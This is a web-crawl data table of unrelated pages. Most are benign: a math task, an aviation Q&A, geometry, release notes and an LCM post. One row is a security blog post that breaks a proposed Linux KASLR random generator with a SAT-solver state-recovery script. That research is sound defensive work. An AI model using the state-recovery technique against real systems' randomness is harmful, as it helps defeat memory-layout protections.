url
stringlengths 14
2.42k
| text
stringlengths 100
1.02M
| date
stringlengths 19
19
| metadata
stringlengths 1.06k
1.1k
|
---|---|---|---|
https://www.kryptoslogic.com/blog/2020/03/another-look-at-two-linux-kaslr-patches/ | # A fast pseudorandom generator for KASLR
A recent patchset proposed for the Linux KASLR randomizes not only the kernel base address, but also reorders every function at boot time. As such, it no longer suffices to leak an arbitrary kernel function pointer, or so the logic goes.
Along with this patchset came a custom random number generator intended to be as fast as possible, so as to keep the boot time overhead at a minimum:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 /* * 64bit variant of Bob Jenkins' public domain PRNG * 256 bits of internal state */ struct prng_state { u64 a, b, c, d; }; static struct prng_state state; static bool initialized; #define rot(x, k) (((x)<<(k))|((x)>>(64-(k)))) static u64 prng_u64(struct prng_state *x) { u64 e; e = x->a - rot(x->b, 7); x->a = x->b ^ rot(x->c, 13); x->b = x->c + rot(x->d, 37); x->c = x->d + e; x->d = e + x->a; return x->d; } static void prng_init(struct prng_state *state) { int i; state->a = kaslr_get_random_seed(NULL); state->b = kaslr_get_random_seed(NULL); state->c = kaslr_get_random_seed(NULL); state->d = kaslr_get_random_seed(NULL); for (i = 0; i < 30; ++i) (void)prng_u64(state); initialized = true; } unsigned long kaslr_get_prandom_long(void) { if (!initialized) prng_init(&state); return prng_u64(&state); }
This was quickly decried as dangerous, and as Andy Lutomirski puts it,
> Ugh, don’t do this. Use a real DRBG. Someone is going to break the
> construction in your patch just to prove they can.
>
> ChaCha20 is a good bet.
In the end, this random number generator was quickly removed, and that was that.
But one can still wonder—is this generator secure but unanalyzed, or would it have been broken just to prove a point?
# Bob Jenkins’s Small PRNG
The above generator was, as per the comment, derived from one of Bob Jenkins’s small-state generators1. It is, in particular, the following “three rotation 64-bit variant”:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 typedef unsigned long long u8; typedef struct ranctx { u8 a; u8 b; u8 c; u8 d; } ranctx; #define rot(x,k) (((x)<<(k))|((x)>>(64-(k)))) u8 ranval( ranctx *x ) { u8 e = x->a - rot(x->b, 7); x->a = x->b ^ rot(x->c, 13); x->b = x->c + rot(x->d, 37); x->c = x->d + e; x->d = e + x->a; return x->d; } void raninit( ranctx *x, u8 seed ) { u8 i; x->a = 0xf1ea5eed, x->b = x->c = x->d = seed; for (i=0; i<20; ++i) { (void)ranval(x); } }
The core consists of the iteration of a permutation; we can easily compute its inverse iteration as
1 2 3 4 5 6 7 8 u8 ranval_inverse( ranctx *x ) { u8 e = x->d - x->a; x->d = x->c - e; x->c = x->b - rot(x->d, 37); x->b = x->a ^ rot(x->c, 13); x->a = e + rot(x->b, 7); return x->d; }
The core permutation present in ranval is depicted below.
This resembles a Type-3 Feistel network2, with some added operations for extra diffusion. Nevertheless, the resemblance still means that there are relatively few changes from one state to the next.
The mode of operation, in modern terms, looks pretty much like a sponge pseudorandom generator with a capacity of 192 bits and a rate of 64 bits. As such, an ideal permutation in this mode of operation should be indistinguishable from a random stream until approximately $2^{96}$ captured 64-bit words.
## Analysis
There are several ways to try and attack a pseudorandom generator:
• We can try and find a bias in its output stream;
• We can try to find a weakness in its initialization;
• We can try to recover an intermediate state from its output;
• Many more…
Our approach here will the be third one. The initialization, with its 20 rounds (or 30 in the KASLR version), is unlikely to have easily exploitable properties. Finding a bias in the output stream seems feasible, but in practical terms it has rather limited applicability.
Becase the permutation is rather simple, we will try to model the problem algebraically. This means representing the problem as a multivariate system of equations in $\mathbb{F}_2$, where $a \cdot b$ means bitwise and, and $a + b$ means bitwise xor. Since the permutation above consists only of a combination of additions, xor, and rotations, every operation is trivial to represent except addition (and subtraction).
Let $x, y$ and $z$ be 64-bit variables, and $x_i$ (resp. $y_i, z_i$) indicate the $i$th bit of $x$ (resp. $y, z$). One can represent 64-bit addition $z = x \boxplus_{64} y$ as a recursive system3:
\begin{align} z_0 &= x_0 + y_0 \newline c_0 &= x_0 \cdot y_0 \newline z_i &= x_i + y_i + c_{i-1} \newline c_i &= x_i \cdot y_i + c_{i-1} \cdot (x_i + y_i) \newline &= x_i \cdot y_i + c_{i-1} \cdot x_i + c_{i-1} \cdot y_i \end{align}
While this representation is quite simple, and can be represented purely as a function of the input bits, it is not good for analysis. This is because the algebraic degree, that is, the monomial $x_i x_j \dots y_k y_l \dots$ with the most elements can have up to 63 variables. Working with polynomials of such high degree is not practical, due to memory and computational requirements, and therefore we do the most common trick in the business—if the system is too complex, add new variables to make it simpler:
\begin{align} z_0 &= x_i + y_i \newline z_i &= x_i + y_i + x_{i-1}\cdot y_{i-1} + (z_{i-1} + x_{i-1} + y_{i-1})\cdot(x_{i-1} + y_{i-1}) \newline &= x_i + y_i + x_{i-1}\cdot y_{i-1} + z_{i-1}\cdot x_{i-1} + z_{i-1} \cdot y_{i-1} + x_{i-1} + y_{i-1} \end{align}
It is clear that this is equivalent to the above by checking that $c_{i-1} = z_{i-1} + x_{i-1} + y_{i-1}$. Now we add 64 extra variables for each addition, that is, $z_i$ are actual variables in our equation system, but the algebraic degree remains 2.
The equation system for subtraction is the same as with addition, with a simple reordering of the variables. Alternatively, we can explicitly write it as
\begin{align} z_0 &= x_i + y_i \newline z_i &= x_i + y_i + (x_{i-1} + 1)\cdot y_{i-1} + (z_{i-1} + x_{i-1} + y_{i-1})\cdot((x_{i-1} + 1) + y_{i-1}) \newline &= x_i + y_i + x_{i-1}\cdot y_{i-1} + z_{i-1}\cdot x_{i-1} + z_{i-1}\cdot y_{i-1} + z_{i-1} + y_{i-1} \end{align}
Now it becomes quite straightforward to model the entire round as an equation system like above, reordering the equations such that it becomes a system of the form \begin{align} p_1(x_0,\dots) &= 0, \newline p_2(x_0,\dots) &= 0, \newline \dots & \newline p_l(x_0,\dots) &= 0, \newline \end{align} which we call the algebraic normal form, or ANF, of the system.
Below we present a Python script that does exactly this, receiving a number of output leaks as arguments:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 import sys BITS = 64 def VAR(n=BITS): if not hasattr(VAR, "counter"): VAR.counter = 0 t = [ VAR.counter + i for i in range(n) ] VAR.counter += n return t def ROTL(x, c): z = x[:] for i in range(c): z = z[-1:] + z[0:-1] return z # Model c = a ^ b def XOR(c, a, b): for i in range(BITS): L.append('x{} + x{} + x{}'.format(c[i], a[i], b[i])) # Model c = a + b def ADD(c, a, b): L.append('x{} + x{} + x{}'.format(c[0], a[0], b[0])) for i in range(1,BITS): L.append('x{0} + x{1} + x{2} + x{3}*x{4} + x{3} + x{4} + x{3}*x{5} + x{4}*x{5}'.format(c[i], a[i], b[i], a[i-1], b[i-1], c[i-1])) # Model c = a - b def SUB(c, a, b): L.append('x{} + x{} + x{}'.format(c[0], a[0], b[0])) for i in range(1,BITS): L.append('x{0} + x{1} + x{2} + x{3}*x{4} + x{4} + x{5} + x{3}*x{5} + x{4}*x{5}'.format(c[i], a[i], b[i], a[i-1], b[i-1], c[i-1])) def EQ(a, b): for i in range(BITS): L.append('x{} + {}'.format(a[i], (b >> i)&1)) L = [] a = VAR() b = VAR() c = VAR() d = VAR() D = int(sys.argv[1], 0) EQ(d, D) for i in range(2, len(sys.argv)): e = VAR() # e = a - ROTL(b, 7) SUB(e, a, ROTL(b, 7)) # a = b ^ ROTL(c, 13) a_ = VAR() XOR(a_, b, ROTL(c, 13)) # b = c + ROTL(d, 37) b_ = VAR() ADD(b_, c, ROTL(d, 37)) # c = d + e c_ = VAR() ADD(c_, d, e) # d = e + a d_ = VAR() ADD(d_, e, a_) a, b, c, d = a_, b_, c_, d_ D = int(sys.argv[i], 0) EQ(d, D) print('\n'.join(L))
Having this system, we can solve it in two main ways:
We note that both Gröbner bases and boolean satisfiability are NP-complete problems. However, for small enough and simple enough systems, the heuristics used by good modern solvers make many of these problems tractable.
Although we tinkered with the first approach, the latter is both simpler to implement and more efficient. We also made use of the recent and quite convenient tool Bosphorus, which makes it straightforward to export a simplified CNF given an ANF equation system exported by our script above:
1 2 3 ./bob 8 | xargs python bob.py > /tmp/test.anf && bosphorus -v 0 --simplify=1 --sat=0 --xldeg=3 --anfread /tmp/test.anf --cnfwrite /tmp/test.cnf && ./cadical --unsat -q /tmp/test.cnf | python recover.py Initial state: 0x512E276FCD97EE94 0xE5326BC5D9053F7F 0x4746014B33BEBC20 0x5012637EA2980D1E 0x512E276FCD97EE94 0xE5326BC5D9053F7F 0x4746014B33BEBC20 0x5012637EA2980D1E
In the above snippet, we use ./bob to generate a random state and leak 8 outputs, bob.py (the script above) to create the ANF from these leaks, bosphorus to convert the system to CNF, CaDiCaL4 to solve the system, and recover.py to convert the output of cadical back to readable integer values.
The number of leaked values is significant to the recovery speed. The minimum number of consecutive leaks to have a unique solution is 4—the initial value of d plus 3 other leaks to constrain the $2^{192}$ possible initial state variables $a, b, c$ to a single value.
However, 4 leaks seems to make the problem quite hard for SAT solvers. If, instead, we use 5 leaks the problem becomes tractable. The more leaks we have, the faster it will be, until a certain point. We found, experimentally, that 8 leaks are the sweet spot for recovery time, with more leaks failing to speed things up.
The following table contains the solving speeds, on an Intel Core i7-4770, for various numbers of leaks, averaged over 100 runs:
Leaked words Average state recovery time (seconds) 5 95 6 43 7 31 8 26 9 27 10 28 11 29
Thus, it is safe to say that this generator is not suitable for cryptographic purposes.
We also note that SMT solvers could have been used to make the instantiation of the problem simpler. However, this results in poorer solving performance, and the performance across SMT solvers fluctuates even wilder than with our approach.
# Carried Away
And now for something completely different.
While looking through the KASLR code, we find a peculiar piece of code in kaslr_get_random_long, the function that is used to get random values for KASLR:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 unsigned long kaslr_get_random_long(const char *purpose) { #ifdef CONFIG_X86_64 const unsigned long mix_const = 0x5d6008cbf3848dd3UL; #else const unsigned long mix_const = 0x3f39e593UL; #endif unsigned long raw, random = get_boot_seed(); bool use_i8254 = true; debug_putstr(purpose); debug_putstr(" KASLR using"); if (has_cpuflag(X86_FEATURE_RDRAND)) { debug_putstr(" RDRAND"); if (rdrand_long(&raw)) { random ^= raw; use_i8254 = false; } } if (has_cpuflag(X86_FEATURE_TSC)) { debug_putstr(" RDTSC"); raw = rdtsc(); random ^= raw; use_i8254 = false; } if (use_i8254) { debug_putstr(" i8254"); random ^= i8254(); } /* Circular multiply for better bit diffusion */ asm(_ASM_MUL "%3" : "=a" (random), "=d" (raw) : "a" (random), "rm" (mix_const)); random += raw; debug_putstr("...\n"); return random; }
The random 32 or 64-bit word that is returned begins with a simple hash of the kernel build and boot information for the present kernel:
1 2 3 4 5 6 7 8 9 10 /* Attempt to create a simple but unpredictable starting entropy. */ static unsigned long get_boot_seed(void) { unsigned long hash = 0; hash = rotate_xor(hash, build_str, sizeof(build_str)); hash = rotate_xor(hash, boot_params, sizeof(*boot_params)); return hash; }
After that, it depends on which CPU features are enabled:
• If rdrand is available, random is xored with its value. Under the assumption that rdrand works as advertised, this should result in a perfectly distributed value.
• If rdtsc is available, random is once again mixed in with the timestamp counter value. This is not as good of an entropy source as rdrand, particularly since rdtsc is usually available system-wide.
• If all else fails, use the i8254 lower-resolution timer.
After doing all this mixing, and in particular if only timers are used, random values are likely to be highly biased—the most significant bits are likely to remain relatively static over time.
To convert this lopsided entropy into a uniformly distributed value, since 2013 the function ends with a “cyclic multiplication” to smooth things over:
1 2 3 4 5 /* Circular multiply for better bit diffusion */ asm(_ASM_MUL "%3" : "=a" (random), "=d" (raw) : "a" (random), "rm" (mix_const)); random += raw;
In short, it computes the full product of random times 0x3f39e593 or 0x5d6008cbf3848dd3, and adds the upper bits (in raw) to the lower bits (in random). This ensures that all the bits are more or less equitably mixed.
But there’s a problem. Two, in fact: one theoretical and one practical.
In theory, what is being attempted here is randomness extraction. There are two usual ways to accomplish this: using a strong hash function modeled as a random oracle, or using a universal hash function and the leftover hash lemma. Here we have neither, and it’s clear that the output only looks unbiased for a naive attacker who cannot simply (approximately) invert the transformation.
The practical issue is different: if the entropy we have is actually well-distributed (say, by using rdrand), then the cyclic multiplication makes it worse by creating many values that are simply unreachable. Why? Because the multiplication—as implemented here—is not bijective.
## Cyclic multiplication
Cyclic multiplication is best interpreted as multiplication modulo $2^n-1$, with lazy reduction. In other words,
$$a \otimes b = \begin{cases} 2^n-1 & \text{ if } a = 2^n-1 \newline a \times b \bmod (2^n-1) & \text{ otherwise. } \end{cases}$$
If $b$ is relatively prime to $2^n-1$, this operation is clearly invertible. Its implementation is simple, as well: $$a \otimes b = \left(a \times b \bmod 2^n\right) + \left\lfloor{\frac{a\times b}{2^n}}\right\rfloor \pmod{2^n - 1}\,.$$ This is exactly what was implemented above. But there is one problem—the sum may overflow. To keep correctness, the overflowing bit—the carry—must be added back to the result.
If the carry is not added, there are a number of values proportional to $b$ that will never be reached. In the case of $b = \text{0x3f39e593}$, there are around $2^{28}$ unreachable values—1 out of every 16. While this is not particularly concerning here, it is an unnecessary flaw and easily corrected.
## Fixing it
The fix, now, becomes obvious: simply add the missing carry. This way the final transformation cannot harm a good uniform distribution, unlike before.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 /* Circular multiply for better bit diffusion */ asm("mul %2\n" "add %1, %0\n" "adc $0, %0" : "+a" (random), "=d" (raw) : "rm" (mix_const)); return random; /* Alternatively, a more portable version... */ /* Codegen is equivalent to above in recent gcc/clang versions */ /* Circular multiply for better bit diffusion */ asm(_ASM_MUL "%3" : "=a" (random), "=d" (raw) : "a" (random), "rm" (mix_const)); random += raw; random += random < raw; return random; 1. To be clear, Bob Jenkins never claimed these generators were cryptographically secure. [return] 2. See page 2 of On Generalized Feistel Networks for an idea of what the various Feistel network variants look like. [return] 3. Remember, again, that we are working with individual bits and that$\cdot$means and and$+\$ means xor. [return]
4. Obviously, any SAT solver could have been used here; we used the one that maximized single-thread solving speed for our problem. [return] | 2020-04-08 05:31:37 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 4, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8603101968765259, "perplexity": 2137.460289240288}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585371810617.95/warc/CC-MAIN-20200408041431-20200408071931-00008.warc.gz"} |
https://tasks.illustrativemathematics.org/content-standards/1/OA/C/6/tasks/1084 | \$20 Dot Map Alignments to Content Standards: 1.OA.C.6 Task The attached graphic shows a map. You must get from start to finish by visiting three of the dots, at each dot you have to pay the specified number of dollars. If you have \$20 can you get from start to finish and visit three dots?
Bonus Question #1: Can you find a way to get from start to finish and spend all \$20? Can you find a way to get from start to finish and spend less then \$20?
Bonus Question #2: How many different routes can you find from start to finish that go to three dots and cost \\$20 or less?
IM Commentary
The language for this task is written above a 1st grade reading level, so it will need to be introduced verbally by the teacher. This problem helps students to practice adding three numbers whose sum are 20 or less. It is an open-ended problem with many solutions. This problem would work well either as a whole group or students could work on it as individuals or pairs. If this problem is presented whole group, the teacher needs to blow the graphic up using an Elmo, Smart Board or overhead projector. If students are going to work on it in pairs they will need to be given print-outs of the graphic.
Solution
$$1 + 9 + 9 = 19$$
$$1 + 9 + 10 = 20$$
$$1+ 10 + 9 = 20$$ $$7 + 10 + 3 = 20$$$$8 + 6 + 3 = 17$$$$1+10+3=14$$ | 2020-05-27 22:25:46 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.45874133706092834, "perplexity": 669.7748474179394}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347396163.18/warc/CC-MAIN-20200527204212-20200527234212-00072.warc.gz"} |
https://aviation.stackexchange.com/questions/25503/why-are-emergency-vehicles-needed-for-a-runway-excursion | # Why are emergency vehicles needed for a runway excursion?
When passenger jets have a runway excursion incident such as this one in Birmingham it is apparently common practice to send emergency services vehicles to the aircraft.
Why are emergency services vehicles necessary?
I would think the plane is more than capable of getting back onto the Tarmac, so why doesn't it?
• It is more than capable of getting back onto the Tarmac - really? What makes you think that? – Simon Feb 22 '16 at 20:58
• What you can't see is the wheels on the grass buried up to the bogies. The wheels are relatively narrow and not designed for "off road" use. 45 tons of aircraft will quickly sink it. Even if you could get enough power to move it, the manoeuvre will almost certainly cause a twisting moment on the undercarriage which it is just not designed to handle. Even assuming no twisting, the sudden lurch as it freed itself would likely damage the nose leg. I've seen a heavy jet on the grass. The only way to move it is to tow it. – Simon Feb 22 '16 at 21:28
• Here you can see how buried the wheels were. To answer your question about emergency services, imagine an hydraulic line had split and sprayed oil onto the hot brakes (it had just landed, and this has happened before). A fire starts. If the emergency services had not deployed, what would your question be now? – Simon Feb 22 '16 at 21:36
• In addition to the above, most of the equipment in that photo is airport based. They exist literally for this type of work - why WOULDN'T you use caution and involve them? – Dan Feb 22 '16 at 21:41
• @Dan Exactly. You have people trained in dealing with aircraft emergencies just sitting there. You might as well have them next to the aircraft instead of sipping tea on the other side of the field. – Zach Lipton Feb 22 '16 at 23:10
Why are emergency service vehicles necessary?
Something might have been damaged. What if something was and there is a fuel leak somewhere? Hydraulic leaks are also dangerous, and more likely as hydraulic lines run to the brakes and nose wheel steering. Better safe than sorry, so emergency services go check.
Sometimes, they also disembark passengers via the ladder if it looks like towing the aircraft to terminal will take too long and the aircraft is on unpaved surface where the mobile stairs have trouble going.
They can also help with moving the plane, especially on smaller airports that only have one runway and so have to close until the plane is moved away anyway.
I would think the plane is more than capable of getting back onto the Tarmac, so why doesn't it?
No, it isn't. Aircraft not designed for unpaved surface will usually sink in somewhat, especially if the ground is wet, and require a lot of power to pull out. Sometimes, the tow truck is enough to get it out, sometimes they have to put planks under the wheels and sometimes they have to get out hydraulic jacks or inflatable support bags.
Even if the plane did not dig in and is easy to move, providing the power with the engines is not a smart thing to do, because the engines will throw up dirt and stones that could damage them, other parts of the aircraft, or something else around. Tow truck is much better for that job.
Going off the the runway can be pretty rough. It not unlikely that a passenger got injured or part of the plane got damaged.
Going full throttle on the jets will rip up the dirt and grass and fling it everywhere. It will also put quite a bit of force onto the landing gear which already got a beating from going into the grass.
Much safer to tow it back. You can see the white towing vehicle in front of the plane.
• And even if the risk of someone being injured wasn't likely, you already have the emergency vehicles available so you lose nothing by sending them. Best case: Your crews get an impromptu drill and something to make their day more interesting. Worst case: you need them there ASAP as the aircraft bursts into flames. Either way, there's no downside to sending the emergency services instantly. – Jon Story Feb 25 '16 at 16:31 | 2020-07-08 15:22:23 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.20233282446861267, "perplexity": 1753.5585132805732}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655897027.14/warc/CC-MAIN-20200708124912-20200708154912-00183.warc.gz"} |
https://www.studypug.com/algebra-2/radical-functions-and-expressions/solving-radical-equations | ##### Do better in math today
Radical equations are equations that have variables stunk inside a radical. We will show you how to solve this type of equations in this lesson. | 2017-10-18 09:13:00 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 9, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.653085470199585, "perplexity": 987.2189950383638}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-43/segments/1508187822851.65/warc/CC-MAIN-20171018085500-20171018105500-00870.warc.gz"} |
http://martinerickson.blogspot.com/2012/07/lines-on-hyperbolic-paraboloid.html | ## Saturday, July 7, 2012
### Lines on a Hyperbolic Paraboloid
A ruled surface has the property that through every point on the surface there is a straight line lying on the surface. Cylinders and cones are ruled surfaces. Another example is a hyperbolic paraboloid (a saddle surface). In fact, a hyperbolic paraboloid contains a pair of straight lines through any given point on it. Find equations of a pair of lines through the point $(1,2,3)$ on the hyperbolic paraboloid $z=y^2-x^2$. Prove that these are the only two such lines.
Solution: Remember that a line in space can be given in parametric form $x=x_0+\alpha t$, $y=y_0+\beta t$, $z=z_0+\gamma t$, where $x_0$, $y_0$, $z_0$, $\alpha$, $\beta$, $\gamma$ are constants, and $t \in \mathbf{R}$.
Let $x=1+t$, $y=2+t$. Then $z=(2+t)^2-(1+t)^2=3+2t.$ So we have a line $(x,y,z)=(1+t,2+t,3+2t)$. Similarly, let $x=1+t$, $y=2-t$. Then $z=(2-t)^2-(1+t)^2=3-6t.$ So we have a line $(x,y,z)=(1+t,2-t,3-6t)$.
We will prove that these are the only two lines on $z=y^2-x^2$ through $(1,2,3)$. Assume that $x=1+\alpha t$, $y=2+\beta t$. Then $z=(2+\beta t)^2-(1+ \alpha t)^2=4+4 \beta t + \beta^2 t^2 -1- 2 \alpha t - \alpha^2 t^2.$ In order for us to have a line, the coefficient of $t^2$ must be zero. Hence $\alpha^2=\beta^2$, and $\beta= \pm \alpha$. For definiteness, assume that $\alpha=1$. Then $\beta=\pm 1$, and we have the two cases above.
We could make the same kind of argument to show that given any point on the surface $z=y^2-x^2$, there are exactly two lines through the point and lying on the surface. But there is a method that renders the computations even easier. We make the change of variables $x=X-Y, \quad y=X+Y, \quad z=4Z.$ Then $4Z=(X+Y)^2-(X-Y)^2=X^2+2XY+Y^2-X^2-Y^2+2XY,$ and we obtain the particularly simple equation $Z=XY.$ The critical thing is that the change of variables is linear; lines are mapped to lines. In our problem, the point was $(1,2,3)$. Under the change of variables, this becomes $(\frac{3}{2},\frac{1}{2},\frac{3}{4})$. The lines that pass through this point and lie on the saddle surface have either $X$ or $Y$ constant: $(X,Y,Z)=\left(\frac{3}{2}+s,\frac{1}{2},\frac{3}{4}+\frac{1}{2}s\right) \quad \mbox{and} \quad (X,Y,Z)=\left(\frac{3}{2},\frac{1}{2}+t,\frac{3}{4}+\frac{3}{2}t\right).$ In general, the two lines passing through the point $(X_0,Y_0,Z_0)$ and lying on the surface $Z=XY$ are $(X,Y,Z)=(X_0+s,Y_0,Z_0+sY_0) \quad \mbox{and} \quad (X,Y,Z)=(X_0,Y_0+t,Z_0+tX_0).$ Thus we have two families of lines that rule the saddle surface. The lines in each family do not intersect because if two such lines intersected, the intersection point would be on three lines on the saddle surface. Furthermore, every pair of lines from different families intersect. For two such lines have equations $(X,Y,Z)=(X_1+s,Y_1,Z_1+sY_1) \quad \mbox{and} \quad (X,Y,Z)=(X_2,Y_2+t,Z_2+tX_2),$ and it is easy to see that the lines intersect at the point $(X_2,Y_1,X_2Y_1)$, when $s=X_2-X_1$ and $t=Y_1-Y_2$. | 2017-06-24 03:40:10 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9451233744621277, "perplexity": 75.05516134223562}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-26/segments/1498128320215.92/warc/CC-MAIN-20170624031945-20170624051945-00050.warc.gz"} |
http://www.gafferhq.org/documentation/0.60.8.0/ReleaseNotes/0.57.3.0.html | # 0.57.3.0¶
## Fixes¶
• Viewer : Fixed a bug in the render control widget which caused the entire Viewer to fail if there was an error computing the metadata for an image.
• Arnold : Added workaround for Arnold bug which prevented interactive edits to quad light colour textures.
• CopyAttributes : Fixed bugs triggered by non-existent source locations. CopyAttributes now matches the behavior of CopyPrimitiveVariables : if the source location does not exist, nothing is copied and no error is caused.
• Viewer : Fixed bugs in the “Edit Tweaks…” menu item. The wrong ShaderTweaks node could be displayed for certain upstream configurations of nodes like CopyAttributes, ShuffleAttributes and MergeScenes.
• OSLCode : Removed string substitutions on code, so that symbols such as # can be used directly. Substitutions were of no use anyway, because they were not being applied in a suitable context.
• SceneAlgo : Fixed shaderTweaks() bugs that could cause the wrong node to be returned.
## API¶
• SceneAlgo : Added an attributeHistory() method which returns a computation history for one specific attribute. | 2021-10-20 16:25:11 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.19446580111980438, "perplexity": 6418.937742804514}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323585322.63/warc/CC-MAIN-20211020152307-20211020182307-00514.warc.gz"} |
https://frfly.wordpress.com/2019/02/09/polygons/ | # polygons
The inputs for this example problem are the angle 174 and 360. When a multiple of 174’s add up to a multiple of 360, the program stops. In advance we do not know how many 174s will add up to how many 360s, but we want the first one. This is the Least Common Multiple of Angle A (174) and 360.
LCM (A, 360)
174 has prime factors of 2 * 3 * 29
360 has prime factors of 2 * 2 * 2 * 3 * 3 * 5
the least common multiple is 360 * 29 = 10440.
we can substitute that into either side of the equation
$nA=360R$
$n*174 = 10440$
$10440 = 360*R$
to find that n = 60 and R = 29
The LCM can be figured different ways. There is a famous method of Euclid, and Euler, (no Eugene). There is an excel function to do it. Sample VBA code can be downloaded. The simplest method conceptually is the same way the turtle does it, by adding angles one by one and testing the result.
